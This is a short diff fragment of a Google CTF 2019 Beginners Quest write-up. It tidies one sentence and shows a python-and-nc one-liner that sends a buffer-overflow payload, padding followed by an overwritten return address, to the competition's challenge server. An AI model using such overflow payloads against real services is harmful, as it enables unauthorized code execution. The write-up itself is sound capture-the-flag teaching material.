konelav/writeups/GoogleCTF2019-BQ/day4.md

     $

 See, no segmentation fault, the program thinks that everything is Ok.
-And message that it tries but could not open a flag tells us that we are on the right way.
+And there is message that it tries but could not open a flag tells us that we are on the right way.
 Check it with remote server:

     $ python -c "print('run\n'+('A'*260) + ('A'*4 + '\x58\x08\x40\x00'*4))" | nc buffer-overflow.ctfcompetition.com 1337
     Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.